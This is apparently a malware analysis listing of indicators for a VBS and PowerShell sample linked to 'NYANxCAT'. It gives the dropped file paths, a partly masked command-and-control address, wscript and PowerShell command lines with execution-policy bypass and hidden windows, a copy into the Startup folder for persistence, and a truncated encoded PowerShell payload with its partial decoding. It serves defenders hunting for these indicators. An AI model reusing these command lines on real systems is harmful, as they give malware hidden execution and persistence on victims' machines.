Technical Information
- %TEMP%\2c7.tmp\2d8.vbs
- %TEMP%\2c7.tmp\2d8.vbs
- '19#.#61.193.99':29742
- '<SYSTEM32>\wscript.exe' %TEMP%\2C7.tmp\2D8.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\2C7.tmp\2D8.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';
- '<SYSTEM32>\wscript.exe' %TEMP%\2C7.tmp\2D8.vbs (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\2C7.tmp\2D8.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs'; (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A... (with hidden window)
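- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...
  Note: the visible part of the -enc argument is Base64 over UTF-16LE and decodes to ` $text = ((Get-ItemProperty HKCU:\Software\NYANxCAT\).NYANx`; the remainder is truncated in this listing ("..."), so the full script cannot be recovered from this page. The HKCU:\Software\NYANxCAT\ registry key it reads is a further host indicator to check, alongside the Startup-folder copy NYANxCAT.vbs.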